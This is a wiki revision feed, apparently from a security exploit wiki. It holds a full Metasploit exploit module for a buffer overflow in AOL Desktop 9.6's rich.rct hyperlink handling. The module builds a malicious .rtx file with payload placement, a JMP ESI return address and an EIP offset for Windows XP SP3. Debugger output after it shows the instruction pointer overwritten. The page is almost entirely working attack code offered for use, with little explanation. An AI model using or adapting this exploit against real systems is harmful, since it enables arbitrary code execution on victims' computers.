https://pwnwiki.com/index.php?action=history&feed=atom&title=AOL_Desktop_9.6_RTX%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E AOL Desktop 9.6 RTX緩衝區溢出漏洞 - Revision history 2026-04-07T19:55:30Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=AOL_Desktop_9.6_RTX%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=692&oldid=prev Pwnwiki: Created page with "==EXP== <pre> ## # $Id: aol_desktop_linktag.rb 12284 2011-04-08 23:09:31Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistributio..." 2021-03-27T02:58:33Z <p>Created page with &quot;==EXP== &lt;pre&gt; ## # $Id: aol_desktop_linktag.rb 12284 2011-04-08 23:09:31Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistributio...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> ##<br /> # $Id: aol_desktop_linktag.rb 12284 2011-04-08 23:09:31Z sinn3r $<br /> ##<br /> <br /> ##<br /> # This file is part of the Metasploit Framework and may be subject to<br /> # redistribution and commercial restrictions. Please see the Metasploit<br /> # Framework web site for more information on licensing and terms of use.<br /> # http://metasploit.com/framework/<br /> ##<br /> <br /> require 'msf/core'<br /> <br /> class Metasploit3 &lt; Msf::Exploit::Remote<br /> Rank = NormalRanking<br /> <br /> include Msf::Exploit::FILEFORMAT<br /> <br /> def initialize(info={})<br /> super(update_info(info,<br /> 'Name' =&gt; &quot;AOL Desktop 9.6 RTX Buffer Overflow&quot;,<br /> 'Description' =&gt; %q{<br /> This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct<br /> component. By supplying a long string of data in the hyperlink tag, rich.rct copies<br /> this data into a buffer using a strcpy function, which causes an overflow, and<br /> results arbitritray code execution.<br /> },<br /> 'License' =&gt; MSF_LICENSE,<br /> 'Version' =&gt; &quot;$Revision: 12284 $&quot;,<br /> 'Author' =&gt;<br /> [<br /> 'sup3r', #Initial disclosure, poc (9.5)<br /> 'sickn3ss', #9.6 poc<br /> 'sinn3r', #Metasploit<br /> ],<br /> 'References' =&gt;<br /> [<br /> [ 'OSVDB', '70741'],<br /> [ 'URL', 'http://www.exploit-db.com/exploits/16085/' ],<br /> ],<br /> 'Payload' =&gt;<br /> {<br /> 'BadChars' =&gt; &quot;\x00\x0d\x0a\x3e\x7f&quot;,<br /> 'StackAdjustment' =&gt; -3500,<br /> },<br /> 'DefaultOptions' =&gt;<br /> {<br /> 'ExitFunction' =&gt; &quot;process&quot;,<br /> },<br /> 'Platform' =&gt; 'win', <br /> 'Targets' =&gt;<br /> [<br /> [<br /> 'AOL Desktop 9.6 on Windows XP SP3',<br /> {<br /> 'Ret'=&gt;0x01DB4542, #0x01DB4542 JMP ESI<br /> 'Offset'=&gt;5391, #Offset to EIP<br /> 'Max'=&gt;8000, #Buffer max. Can be more.<br /> },<br /> ],<br /> ],<br /> 'Privileged' =&gt; false,<br /> 'DisclosureDate' =&gt; &quot;Jan 31 2011&quot;,<br /> 'DefaultTarget' =&gt; 0))<br /> <br /> register_options(<br /> [<br /> OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),<br /> ]<br /> )<br /> end<br /> <br /> def exploit<br /> <br /> # Compatible with what the poc has, and what I see on my debugger<br /> sploit = ''<br /> sploit &lt;&lt; rand_text_alpha(4968+16)<br /> sploit &lt;&lt; payload.encoded<br /> sploit &lt;&lt; rand_text_alpha(5368-sploit.length)<br /> sploit &lt;&lt; make_nops(11)<br /> sploit &lt;&lt; &quot;\xe9\x70\xfe\xff\xff&quot; #JMP back 400 bytes<br /> sploit &lt;&lt; [target.ret].pack('V')<br /> sploit &lt;&lt; make_nops(target['Offset']-sploit.length-2)<br /> sploit &lt;&lt; &quot;\xeb\x04&quot;<br /> sploit &lt;&lt; [target.ret].pack('V')<br /> sploit &lt;&lt; payload.encoded<br /> sploit &lt;&lt; rand_text_alpha(target['Max']-sploit.length)<br /> <br /> link_value = rand_text_alpha(6)<br /> <br /> rtx = &quot;&lt;HTML&gt;&quot;<br /> rtx &lt;&lt; &quot;&lt;A HREF=\&quot;#{sploit}\&quot;&gt;#{link_value}&lt;/A&gt;&quot;<br /> rtx &lt;&lt; &quot;&lt;/HTML&gt;&quot;<br /> <br /> print_status(&quot;Creating #{datastore['FILENAME']}...&quot;)<br /> file_create(rtx)<br /> end<br /> end<br /> <br /> =begin<br /> 0:000&gt; g<br /> Breakpoint 0 hit<br /> eax=00000006 ebx=06652370 ecx=02d9c898 edx=038d0000 esi=00000000 edi=02d99b30<br /> eip=6909e187 esp=0022e638 ebp=0022e648 iopl=0 nv up ei pl nz na pe nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206<br /> rich!ToolInit+0xed2c:<br /> 6909e187 e85cd50300 call rich!ToolInit+0x4c28d (690db6e8)<br /> 0:000&gt; g<br /> (8d8.924): Access violation - code c0000005 (first chance)<br /> First chance exceptions are reported before any exception handling.<br /> This exception may be expected and handled.<br /> eax=00000000 ebx=02d38358 ecx=00000000 edx=00000030 esi=02d53cb8 edi=0022e7c4<br /> eip=43434343 esp=0022e760 ebp=0022e780 iopl=0 nv up ei pl nz na po nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202<br /> 43434343 ?? ???<br /> 0:000&gt; dd esi<br /> 02d53cb8 43434343 43434343 43434343 43434343<br /> 02d53cc8 43434343 43434343 43434343 43434343<br /> 02d53cd8 43434343 43434343 43434343 43434343<br /> 02d53ce8 43434343 43434343 43434343 43434343<br /> 02d53cf8 43434343 43434343 43434343 43434343<br /> 02d53d08 43434343 43434343 43434343 43434343<br /> 02d53d18 43434343 43434343 43434343 43434343<br /> 02d53d28 43434343 43434343 43434343 43434343<br /> =end<br /> &lt;/pre&gt;</div> Pwnwiki